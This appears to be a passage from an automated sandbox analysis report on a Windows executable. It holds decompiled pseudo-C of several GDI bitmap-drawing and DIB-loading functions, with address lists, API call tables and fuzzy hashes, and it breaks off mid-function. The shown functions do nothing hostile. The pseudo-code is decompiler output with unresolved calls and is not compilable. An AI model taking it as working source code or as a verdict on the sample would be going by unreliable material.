			E004207E0(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
				int _v8;
				int _v12;
				char _v13;
				struct HDC__* _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				intOrPtr _v40;
				intOrPtr* _t78;
				intOrPtr _t87;
				struct HDC__* _t88;
				intOrPtr _t91;
				struct HDC__* _t92;
				struct HDC__* _t135;
				int _t162;
				intOrPtr _t169;
				intOrPtr _t171;
				struct HDC__* _t173;
				int _t175;
				void* _t177;
				void* _t178;
				intOrPtr _t179;

				_t177 = _t178;
				_t179 = _t178 + 0xffffffdc;
				_v12 = __ecx;
				_v8 = __edx;
				_t173 = __eax;
				_t175 = _a16;
				_t162 = _a20;
				_v13 = 1;
				_t78 =  *0x48e854; // 0x4710ac
				if( *_t78 != 2 || _t162 != _a40 || _t175 != _a36) {
					_v40 = 0;
					_push(0);
					L00406A60();
					_v20 = E0042063C(0);
					_push(_t177);
					_push(0x420a60);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					_push(_t175);
					_push(_t162);
					_push(_a32);
					L00406A58();
					_v24 = E0042063C(_a32);
					_v28 = SelectObject(_v20, _v24);
					_push(0);
					_t87 =  *0x48fa28; // 0x7b0807a3
					_push(_t87);
					_t88 = _a32;
					_push(_t88);
					L00406BD8();
					_v40 = _t88;
					_push(0);
					_push(_v40);
					_push(_a32);
					L00406BD8();
					if(_v40 == 0) {
						_push(0xffffffff);
						_t91 =  *0x48fa28; // 0x7b0807a3
						_push(_t91);
						_t92 = _v20;
						_push(_t92);
						L00406BD8();
						_v40 = _t92;
					} else {
						_push(0xffffffff);
						_push(_v40);
						_t135 = _v20;
						_push(_t135);
						L00406BD8();
						_v40 = _t135;
					}
					_push(_v20);
					L00406BA8();
					StretchBlt(_v20, 0, 0, _t162, _t175, _a12, _a8, _a4, _t162, _t175, 0xcc0020);
					StretchBlt(_v20, 0, 0, _t162, _t175, _a32, _a28, _a24, _t162, _t175, 0x440328);
					_v32 = SetTextColor(_t173, 0);
					_v36 = SetBkColor(_t173, 0xffffff);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t162, _t175, 0x8800c6);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _v20, 0, 0, _t162, _t175, 0x660046);
					SetTextColor(_t173, _v32);
					SetBkColor(_t173, _v36);
					if(_v28 != 0) {
						SelectObject(_v20, _v28);
					}
					DeleteObject(_v24);
					_pop(_t169);
					 *[fs:eax] = _t169;
					_push(E00420A67);
					if(_v40 != 0) {
						_push(0);
						_push(_v40);
						_push(_v20);
						L00406BD8();
					}
					return DeleteDC(_v20);
				} else {
					_push(1);
					_push(1);
					_push(_a32);
					L00406A58();
					_v24 = E0042063C(_a32);
					_v24 = SelectObject(_a12, _v24);
					_push(_t177);
					_push(0x4208b3);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					MaskBlt(_t173, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00407254(0xaa0029, 0xcc0020));
					_pop(_t171);
					 *[fs:eax] = _t171;
					_push(E00420A67);
					_v24 = SelectObject(_a12, _v24);
					return DeleteObject(_v24);
				}
			}

0x004207e1
0x004207e3
0x004207e9
0x004207ec
0x004207ef
0x004207f1
0x004207f4
0x004207f7
0x004207fb
0x00420803
0x004208bc
0x004208bf
0x004208c1
0x004208cb
0x004208d0
0x004208d1
0x004208d6
0x004208d9
0x004208dc
0x004208dd
0x004208e1
0x004208e2
0x004208ec
0x004208fc
0x004208ff
0x00420901
0x00420906
0x00420907
0x0042090a
0x0042090b
0x00420910
0x00420913
0x00420918
0x0042091c
0x0042091d
0x00420926
0x0042093c
0x0042093e
0x00420943
0x00420944
0x00420947
0x00420948
0x0042094d
0x00420928
0x00420928
0x0042092d
0x0042092e
0x00420931
0x00420932
0x00420937
0x00420937
0x00420953
0x00420954
0x00420976
0x00420998
0x004209a5
0x004209b3
0x004209da
0x004209ff
0x00420a09
0x00420a13
0x00420a1c
0x00420a26
0x00420a26
0x00420a2f
0x00420a36
0x00420a39
0x00420a3c
0x00420a45
0x00420a47
0x00420a4c
0x00420a50
0x00420a51
0x00420a51
0x00420a5f
0x0042081b
0x0042081b
0x0042081d
0x00420822
0x00420823
0x0042082d
0x0042083d
0x00420842
0x00420843
0x00420848
0x0042084b
0x00420887
0x0042088e
0x00420891
0x00420894
0x004208a6
0x004208b2
0x004208b2

APIs

72E7A520.GDI32(?,00000001,00000001,00000000,?,?), ref: 00420823
SelectObject.GDI32(?,?), ref: 00420838
MaskBlt.GDI32(?,?,?,?,?,?,00000000,0041FC87,?,?,?,00000000,00000000,004208B3,?,?), ref: 00420887
SelectObject.GDI32(?,?), ref: 004208A1
DeleteObject.GDI32(?), ref: 004208AD
72E7A590.GDI32(00000000,00000000,?,?), ref: 004208C1
72E7A520.GDI32(?,?,?,00000000,00420A60,?,00000000,00000000,?,?), ref: 004208E2
SelectObject.GDI32(?,?), ref: 004208F7
72E7B410.GDI32(?,7B0807A3,00000000,?,?,?,?,?,00000000,00420A60,?,00000000,00000000,?,?), ref: 0042090B
72E7B410.GDI32(?,?,00000000,?,7B0807A3,00000000,?,?,?,?,?,00000000,00420A60,?,00000000,00000000), ref: 0042091D
72E7B410.GDI32(?,00000000,000000FF,?,?,00000000,?,7B0807A3,00000000,?,?,?,?,?,00000000,00420A60), ref: 00420932
72E7B410.GDI32(?,7B0807A3,000000FF,?,?,00000000,?,7B0807A3,00000000,?,?,?,?,?,00000000,00420A60), ref: 00420948
72E7B150.GDI32(?,?,7B0807A3,000000FF,?,?,00000000,?,7B0807A3,00000000,?,?,?,?,?,00000000), ref: 00420954
StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 00420976
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,0041FC87,?,?,00440328), ref: 00420998
SetTextColor.GDI32(?,00000000), ref: 004209A0
SetBkColor.GDI32(?,00FFFFFF), ref: 004209AE
StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 004209DA
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 004209FF
SetTextColor.GDI32(?,0041FC87), ref: 00420A09
SetBkColor.GDI32(?,00000000), ref: 00420A13
SelectObject.GDI32(?,00000000), ref: 00420A26
DeleteObject.GDI32(?), ref: 00420A2F
72E7B410.GDI32(?,00000000,00000000,00420A67,?,0041FC87,?,?,?,?,?,?,00000000,00000000,?,?), ref: 00420A51
DeleteDC.GDI32(?), ref: 00420A5A

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$B410$ColorSelectStretch$Delete$A520Text$A590B150Mask
String ID:
API String ID: 3348367721-0
Opcode ID: d721cc654ccfa92d5653a33c80ae25e3b253b3d4bedada3afb9aa5f10e7419d6
Instruction ID: 5b27035095e30105dd48d7f500274a7d032aa82394eaf58720f6b8b2fee1a88d
Opcode Fuzzy Hash: d721cc654ccfa92d5653a33c80ae25e3b253b3d4bedada3afb9aa5f10e7419d6
Instruction Fuzzy Hash: 4781B2B1A00219AFDB50EEA9CD81FAF77FCAB0D714F510429F619F7281C278AD508B64

Uniqueness

Uniqueness Score: -1.00%

Function 00423F14, Relevance: 31.7, APIs: 21, Instructions: 194
windowCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00423F14(void* __eax, long __ecx, intOrPtr __edx) {
				void* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				char _v21;
				void* _v28;
				void* _v32;
				intOrPtr _v92;
				intOrPtr _v96;
				int _v108;
				int _v112;
				void _v116;
				void* _t64;
				int _t65;
				intOrPtr _t66;
				long _t77;
				void* _t107;
				intOrPtr _t116;
				intOrPtr _t117;
				long _t120;
				intOrPtr _t123;
				void* _t127;
				void* _t129;
				intOrPtr _t130;

				_t127 = _t129;
				_t130 = _t129 + 0xffffff90;
				_t120 = __ecx;
				_t123 = __edx;
				_t107 = __eax;
				_v8 = 0;
				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
					return _v8;
				} else {
					E00423408(_t107);
					_v12 = 0;
					_v20 = 0;
					_push(_t127);
					_push(0x42410f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t130;
					_push(0);
					L00406E30();
					_v12 = E0042063C(0);
					_push(_v12);
					L00406A60();
					_v20 = E0042063C(_v12);
					_push(0);
					_push(1);
					_push(1);
					_push(_v108);
					_t64 = _v112;
					_push(_t64);
					L00406A48();
					_v8 = _t64;
					if(_v8 == 0) {
						L17:
						_t65 = 0;
						_pop(_t116);
						 *[fs:eax] = _t116;
						_push(0x424116);
						if(_v20 != 0) {
							_t65 = DeleteDC(_v20);
						}
						if(_v12 != 0) {
							_t66 = _v12;
							_push(_t66);
							_push(0);
							L00407090();
							return _t66;
						}
						return _t65;
					} else {
						_v32 = SelectObject(_v20, _v8);
						if(__ecx != 0x1fffffff) {
							_push(_v12);
							L00406A60();
							_v16 = E0042063C(_v12);
							_push(_t127);
							_push(0x4240c7);
							_push( *[fs:eax]);
							 *[fs:eax] = _t130;
							if(_v96 == 0) {
								_v21 = 0;
							} else {
								_v21 = 1;
								_v92 = 0;
								_t107 = E0042384C(_t107, _t123, _t123, 0,  &_v116);
							}
							_v28 = SelectObject(_v16, _t107);
							if(_t123 != 0) {
								_push(0);
								_push(_t123);
								_push(_v16);
								L00406BD8();
								_push(_v16);
								L00406BA8();
								_push(0);
								_push(_t123);
								_push(_v20);
								L00406BD8();
								_push(_v20);
								L00406BA8();
							}
							_t77 = SetBkColor(_v16, _t120);
							_push(0xcc0020);
							_push(0);
							_push(0);
							_push(_v16);
							_push(_v108);
							_push(_v112);
							_push(0);
							_push(0);
							_push(_v20);
							L00406A38();
							SetBkColor(_v16, _t77);
							if(_v28 != 0) {
								SelectObject(_v16, _v28);
							}
							if(_v21 != 0) {
								DeleteObject(_t107);
							}
							_pop(_t117);
							 *[fs:eax] = _t117;
							_push(0x4240ce);
							return DeleteDC(_v16);
						} else {
							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
							if(_v32 != 0) {
								SelectObject(_v20, _v32);
							}
							goto L17;
						}
					}
				}
			}

0x00423f15
0x00423f17
0x00423f1d
0x00423f1f
0x00423f21
0x00423f25
0x00423f2a
0x0042411f
0x00423f44
0x00423f46
0x00423f4d
0x00423f52
0x00423f57
0x00423f58
0x00423f5d
0x00423f60
0x00423f63
0x00423f65
0x00423f6f
0x00423f75
0x00423f76
0x00423f80
0x00423f83
0x00423f85
0x00423f87
0x00423f8c
0x00423f8d
0x00423f90
0x00423f91
0x00423f96
0x00423f9d
0x004240e1
0x004240e1
0x004240e3
0x004240e6
0x004240e9
0x004240f2
0x004240f8
0x004240f8
0x00424101
0x00424103
0x00424106
0x00424107
0x00424109
0x00000000
0x00424109
0x0042410e
0x00423fa3
0x00423fb0
0x00423fb9
0x00423fda
0x00423fdb
0x00423fe5
0x00423fea
0x00423feb
0x00423ff0
0x00423ff3
0x00423ffa
0x0042401a
0x00423ffc
0x00423ffc
0x00424002
0x00424016
0x00424016
0x00424028
0x0042402d
0x0042402f
0x00424031
0x00424035
0x00424036
0x0042403e
0x0042403f
0x00424044
0x00424046
0x0042404a
0x0042404b
0x00424053
0x00424054
0x00424054
0x0042405e
0x00424065
0x0042406a
0x0042406c
0x00424071
0x00424075
0x00424079
0x0042407a
0x0042407c
0x00424081
0x00424082
0x0042408c
0x00424095
0x0042409f
0x0042409f
0x004240a8
0x004240ab
0x004240ab
0x004240b2
0x004240b5
0x004240b8
0x004240c6
0x00423fbb
0x00423fcd
0x004240d2
0x004240dc
0x004240dc
0x00000000
0x004240d2
0x00423fb9
0x00423f9d

APIs

GetObjectA.GDI32(00000000,00000054,?), ref: 00423F37
72E7AC50.USER32(00000000,00000000,0042410F,?,00000000,?,?), ref: 00423F65
72E7A590.GDI32(?,00000000,00000000,0042410F,?,00000000,?,?), ref: 00423F76
72E7A410.GDI32(?,?,00000001,00000001,00000000,?,00000000,00000000,0042410F,?,00000000,?,?), ref: 00423F91
SelectObject.GDI32(?,00000000), ref: 00423FAB
PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 00423FCD
72E7A590.GDI32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,0042410F,?,00000000,?,?), ref: 00423FDB
SelectObject.GDI32(00000000,00000000), ref: 00424023
72E7B410.GDI32(00000000,?,00000000,00000000,00000000,00000000,004240C7,?,?,?,00000000,?,?,00000001,00000001,00000000), ref: 00424036
72E7B150.GDI32(00000000,00000000,?,00000000,00000000,00000000,00000000,004240C7,?,?,?,00000000,?,?,00000001,00000001), ref: 0042403F
72E7B410.GDI32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,004240C7,?,?,?,00000000,?), ref: 0042404B
72E7B150.GDI32(?,?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,004240C7,?,?,?,00000000), ref: 00424054
SetBkColor.GDI32(00000000,00000000), ref: 0042405E
72E897E0.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,00000000,00000000,004240C7), ref: 00424082
SetBkColor.GDI32(00000000,00000000), ref: 0042408C
SelectObject.GDI32(00000000,00000000), ref: 0042409F
DeleteObject.GDI32(00000000), ref: 004240AB
DeleteDC.GDI32(00000000), ref: 004240C1
SelectObject.GDI32(?,00000000), ref: 004240DC
DeleteDC.GDI32(00000000), ref: 004240F8
72E7B380.USER32(00000000,00000000,00424116,00000001,00000000,?,00000000,00000000,0042410F,?,00000000,?,?), ref: 00424109

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Select$Delete$A590B150B410Color$A410B380E897
String ID:
API String ID: 4241548881-0
Opcode ID: 128d66ff8636967e8323bc944014962b849494cb92d13c9dc30956ab23de2638
Instruction ID: b272bdfb076349d32791c8da0b54aed61b5c62d759d74d295c031d203ea9bad8
Opcode Fuzzy Hash: 128d66ff8636967e8323bc944014962b849494cb92d13c9dc30956ab23de2638
Instruction Fuzzy Hash: 65512171F00228ABDB10EBE9DC45FAEB7FCEB48704F51446AB605F7281D67C99508B58

Uniqueness

Uniqueness Score: -1.00%

Function 00424D70, Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 351
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00424D70(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				void* _v16;
				struct HDC__* _v20;
				char _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v37;
				intOrPtr _v44;
				void* _v48;
				struct HDC__* _v52;
				intOrPtr _v56;
				intOrPtr* _v60;
				intOrPtr* _v64;
				short _v66;
				short _v68;
				signed short _v70;
				signed short _v72;
				void* _v76;
				intOrPtr _v172;
				char _v174;
				intOrPtr _t150;
				signed int _t160;
				intOrPtr _t163;
				void* _t166;
				void* _t174;
				void* _t183;
				signed int _t188;
				intOrPtr _t189;
				struct HDC__* _t190;
				struct HDC__* _t204;
				signed int _t208;
				signed short _t214;
				intOrPtr _t241;
				intOrPtr* _t245;
				intOrPtr _t251;
				intOrPtr _t289;
				intOrPtr _t290;
				intOrPtr _t295;
				signed int _t297;
				signed int _t317;
				void* _t319;
				void* _t320;
				signed int _t321;
				void* _t322;
				void* _t323;
				void* _t324;
				intOrPtr _t325;

				_t316 = __edi;
				_t323 = _t324;
				_t325 = _t324 + 0xffffff54;
				_t319 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v52 = 0;
				_v44 = 0;
				_v60 = 0;
				 *((intOrPtr*)( *_v12 + 8))(__edi, __esi, __ebx, _t322);
				_v37 = _v36 == 0xc;
				if(_v37 != 0) {
					_v36 = 0x28;
				}
				_v28 = E0040272C(_v36 + 0x40c);
				_v64 = _v28;
				_push(_t323);
				_push(0x42528d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_push(_t323);
				_push(0x425260);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				if(_v37 == 0) {
					 *((intOrPtr*)( *_v12 + 8))();
					_t320 = _t319 - _v36;
					_t150 =  *((intOrPtr*)(_v64 + 0x10));
					if(_t150 != 3 && _t150 != 0) {
						_v60 = E00403584(1);
						if(_a4 == 0) {
							E00402EC8( &_v174, 0xe);
							_v174 = 0x4d42;
							_v172 = _v36 + _t320;
							_a4 =  &_v174;
						}
						 *((intOrPtr*)( *_v60 + 0xc))();
						 *((intOrPtr*)( *_v60 + 0xc))();
						 *((intOrPtr*)( *_v60 + 0xc))();
						E00416710(_v60,  *_v60, _v12, _t316, _t320, _t320, 0);
						 *((intOrPtr*)( *_v60 + 0x10))();
						_v12 = _v60;
					}
				} else {
					 *((intOrPtr*)( *_v12 + 8))();
					_t251 = _v64;
					E00402EC8(_t251, 0x28);
					_t241 = _t251;
					 *(_t241 + 4) = _v72 & 0x0000ffff;
					 *(_t241 + 8) = _v70 & 0x0000ffff;
					 *((short*)(_t241 + 0xc)) = _v68;
					 *((short*)(_t241 + 0xe)) = _v66;
					_t320 = _t319 - 0xc;
				}
				_t245 = _v64;
				 *_t245 = _v36;
				_v32 = _v28 + _v36;
				if( *((short*)(_t245 + 0xc)) != 1) {
					E0042051C();
				}
				if(_v36 == 0x28) {
					_t214 =  *(_t245 + 0xe);
					if(_t214 == 0x10 || _t214 == 0x20) {
						if( *((intOrPtr*)(_t245 + 0x10)) == 3) {
							E004166A0(_v12, 0xc, _v32);
							_v32 = _v32 + 0xc;
							_t320 = _t320 - 0xc;
						}
					}
				}
				if( *(_t245 + 0x20) == 0) {
					 *(_t245 + 0x20) = E004207AC( *(_t245 + 0xe));
				}
				_t317 = _v37 & 0x000000ff;
				_t257 =  *(_t245 + 0x20) * 0;
				E004166A0(_v12,  *(_t245 + 0x20) * 0, _v32);
				_t321 = _t320 -  *(_t245 + 0x20) * 0;
				if( *(_t245 + 0x14) == 0) {
					_t297 =  *(_t245 + 0xe) & 0x0000ffff;
					_t208 = E004207CC( *((intOrPtr*)(_t245 + 4)), 0x20, _t297);
					asm("cdq");
					_t257 = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
					 *(_t245 + 0x14) = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
				}
				_t160 =  *(_t245 + 0x14);
				if(_t321 > _t160) {
					_t321 = _t160;
				}
				if(_v37 != 0) {
					_t160 = E00420A74(_v32);
				}
				_push(0);
				L00406E30();
				_v16 = E0042063C(_t160);
				_push(_t323);
				_push(0x4251db);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_t163 =  *((intOrPtr*)(_v64 + 0x10));
				if(_t163 == 0 || _t163 == 3) {
					if( *0x471514 == 0) {
						_push(0);
						_push(0);
						_push( &_v24);
						_push(0);
						_push(_v28);
						_t166 = _v16;
						_push(_t166);
						L00406A68();
						_v44 = _t166;
						if(_v44 == 0 || _v24 == 0) {
							if(GetLastError() != 0) {
								E0040B2D0(_t245, _t257, _t317, _t321);
							} else {
								E0042051C();
							}
						}
						_push(_t323);
						_push( *[fs:eax]);
						 *[fs:eax] = _t325;
						E004166A0(_v12, _t321, _v24);
						_pop(_t289);
						 *[fs:eax] = _t289;
						_t290 = 0x4251aa;
						 *[fs:eax] = _t290;
						_push(0x4251e2);
						_t174 = _v16;
						_push(_t174);
						_push(0);
						L00407090();
						return _t174;
					} else {
						goto L27;
					}
				} else {
					L27:
					_v20 = 0;
					_v24 = E0040272C(_t321);
					_push(_t323);
					_push(0x425143);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_t263 = _t321;
					E004166A0(_v12, _t321, _v24);
					_push(_v16);
					L00406A60();
					_v20 = E0042063C(_v16);
					_push(1);
					_push(1);
					_t183 = _v16;
					_push(_t183);
					L00406A58();
					_v48 = SelectObject(_v20, _t183);
					_v56 = 0;
					_t188 =  *(_v64 + 0x20);
					if(_t188 > 0) {
						_t263 = _t188;
						_v52 = E00420D2C(0, _t188);
						_push(0);
						_push(_v52);
						_t204 = _v20;
						_push(_t204);
						L00406BD8();
						_v56 = _t204;
						_push(_v20);
						L00406BA8();
					}
					_push(_t323);
					_push(0x425117);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_push(0);
					_t189 = _v28;
					_push(_t189);
					_push(_v24);
					_push(4);
					_push(_t189);
					_t190 = _v20;
					_push(_t190);
					L00406A70();
					_v44 = _t190;
					if(_v44 == 0) {
						if(GetLastError() != 0) {
							E0040B2D0(_t245, _t263, _t317, _t321);
						} else {
							E0042051C();
						}
					}
					_pop(_t295);
					 *[fs:eax] = _t295;
					_push(0x42511e);
					if(_v56 != 0) {
						_push(0xffffffff);
						_push(_v56);
						_push(_v20);
						L00406BD8();
					}
					return DeleteObject(SelectObject(_v20, _v48));
				}
			}

0x00424d70
0x00424d71
0x00424d73
0x00424d7c
0x00424d7e
0x00424d81
0x00424d86
0x00424d8b
0x00424d90
0x00424da0
0x00424da7
0x00424daf
0x00424db1
0x00424db1
0x00424dc8
0x00424dce
0x00424dd3
0x00424dd4
0x00424dd9
0x00424ddc
0x00424de1
0x00424de2
0x00424de7
0x00424dea
0x00424df1
0x00424e50
0x00424e53
0x00424e59
0x00424e5f
0x00424e79
0x00424e80
0x00424e8f
0x00424e94
0x00424ea2
0x00424eae
0x00424eae
0x00424ebe
0x00424ece
0x00424ee2
0x00424ef1
0x00424f03
0x00424f09
0x00424f09
0x00424df3
0x00424e03
0x00424e06
0x00424e12
0x00424e17
0x00424e1d
0x00424e24
0x00424e2b
0x00424e33
0x00424e37
0x00424e37
0x00424f0c
0x00424f12
0x00424f1a
0x00424f22
0x00424f24
0x00424f24
0x00424f2d
0x00424f2f
0x00424f37
0x00424f43
0x00424f50
0x00424f55
0x00424f59
0x00424f59
0x00424f43
0x00424f37
0x00424f60
0x00424f6b
0x00424f6b
0x00424f71
0x00424f7d
0x00424f86
0x00424f98
0x00424f9e
0x00424fa0
0x00424fac
0x00424fb6
0x00424fbb
0x00424fbe
0x00424fbe
0x00424fc1
0x00424fc6
0x00424fc8
0x00424fc8
0x00424fce
0x00424fd3
0x00424fd3
0x00424fd8
0x00424fda
0x00424fe4
0x00424fe9
0x00424fea
0x00424fef
0x00424ff2
0x00424ff8
0x00424ffd
0x0042500b
0x0042514a
0x0042514c
0x00425151
0x00425152
0x00425157
0x00425158
0x0042515b
0x0042515c
0x00425161
0x00425168
0x00425177
0x00425180
0x00425179
0x00425179
0x00425179
0x00425177
0x00425187
0x0042518d
0x00425190
0x0042519b
0x004251a2
0x004251a5
0x004251c4
0x004251c7
0x004251ca
0x004251cf
0x004251d2
0x004251d3
0x004251d5
0x004251da
0x00000000
0x00000000
0x00000000
0x00425011
0x00425011
0x00425013
0x0042501d
0x00425022
0x00425023
0x00425028
0x0042502b
0x00425031
0x00425036
0x0042503e
0x0042503f
0x00425049
0x0042504c
0x0042504e
0x00425050
0x00425053
0x00425054
0x00425063
0x00425068
0x0042506e
0x00425073
0x00425075
0x00425081
0x00425084
0x00425089
0x0042508a
0x0042508d
0x0042508e
0x00425093
0x00425099
0x0042509a
0x0042509a
0x004250a1
0x004250a2
0x004250a7
0x004250aa
0x004250ad
0x004250af
0x004250b2
0x004250b6
0x004250b7
0x004250b9
0x004250ba
0x004250bd
0x004250be
0x004250c3
0x004250ca
0x004250d3
0x004250dc
0x004250d5
0x004250d5
0x004250d5
0x004250d3
0x004250e3
0x004250e6
0x004250e9
0x004250f2
0x004250f4
0x004250f9
0x004250fd
0x004250fe
0x004250fe
0x00425116
0x00425116

APIs

72E7AC50.USER32(00000000,?,00000000,0042528D,?,?,?,?,?,?,00424C27,00000000,00000000,00424C3D,?,00000002), ref: 00424FDA
72E7A590.GDI32(00000001,00000000,00425143,?,00000000,004251DB,?,00000000,?,00000000,0042528D,?,?), ref: 0042503F
72E7A520.GDI32(00000001,00000001,00000001,00000001,00000000,00425143,?,00000000,004251DB,?,00000000,?,00000000,0042528D,?,?), ref: 00425054
SelectObject.GDI32(?,00000000), ref: 0042505E
72E7B410.GDI32(?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,00425143,?,00000000,004251DB,?,00000000), ref: 0042508E
72E7B150.GDI32(?,?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,00425143,?,00000000,004251DB), ref: 0042509A
72E7A7F0.GDI32(?,?,00000004,00000000,?,00000000,00000000,00425117,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 004250BE
GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00425117,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 004250CC
72E7B410.GDI32(?,00000000,000000FF,0042511E,00000000,?,00000000,00000000,00425117,?,?,00000000,00000001,00000001,00000001,00000001), ref: 004250FE
SelectObject.GDI32(?,?), ref: 0042510B
DeleteObject.GDI32(00000000), ref: 00425111

Strings

(, xrefs: 00424F29
\"A, xrefs: 00424E6F
BM, xrefs: 00424E94

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$B410Select$A520A590B150DeleteErrorLast
String ID: ($BM$\"A
API String ID: 3415089252-2049922049
Opcode ID: 91c77a580dd6a47518a23d3cfe11cbbfde1e859c29eae005f351ef8fa3dbb60f
Instruction ID: 4ec1d1a1a48779b95589b0d5f5ad82573584ea63a882b9added62f77f37c2d8c
Opcode Fuzzy Hash: 91c77a580dd6a47518a23d3cfe11cbbfde1e859c29eae005f351ef8fa3dbb60f
Instruction Fuzzy Hash: E7D13C74F002189FDB04DFA9D885BAEBBB5EF48304F51846AE905EB391D7389850CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0046A130, Relevance: 23.0, APIs: 15, Instructions: 468
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0046A130(intOrPtr __eax, char __edx) {
				intOrPtr _v8;
				char _v9;
				intOrPtr* _v16;
				intOrPtr* _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				char _v44;
				char _v60;
				void* __edi;
				void* __ebp;
				signed int _t170;
				signed int _t176;
				void* _t209;
				void* _t213;
				intOrPtr _t218;
				intOrPtr _t241;
				void* _t254;
				void* _t325;
				void* _t345;
				void* _t361;
				void* _t368;
				intOrPtr _t382;
				intOrPtr _t388;
				struct HDC__* _t392;
				struct HDC__* _t393;
				struct HDC__* _t394;
				void* _t421;
				void* _t422;
				void* _t423;
				intOrPtr _t447;
				intOrPtr _t464;
				void* _t478;
				signed int _t486;
				void* _t491;
				void* _t493;
				void* _t495;
				intOrPtr _t496;
				void* _t506;

				_t493 = _t495;
				_t496 = _t495 + 0xffffffc8;
				_v9 = __edx;
				_v8 = __eax;
				if(_v9 == 2 &&  *(_v8 + 0x20) < 3) {
					_v9 = 0;
				}
				_t388 =  *((intOrPtr*)(_v8 + 0xc));
				if(_t388 != 0xffffffff) {
					L24:
					return _t388;
				} else {
					_t170 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
					if((_t170 |  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))()) == 0) {
						goto L24;
					} else {
						_t176 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
						asm("cdq");
						_t486 = _t176 / ( *(_v8 + 0x20) & 0x000000ff);
						_t491 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))();
						if( *((intOrPtr*)(_v8 + 8)) == 0) {
							_t503 =  *0x471ce0;
							if( *0x471ce0 == 0) {
								 *0x471ce0 = E00469E24(1);
							}
							_t382 =  *0x471ce0; // 0x0
							 *((intOrPtr*)(_v8 + 8)) = E00469E98(_t382, _t491, _t486);
						}
						_v16 = E00424120(1);
						 *[fs:eax] = _t496;
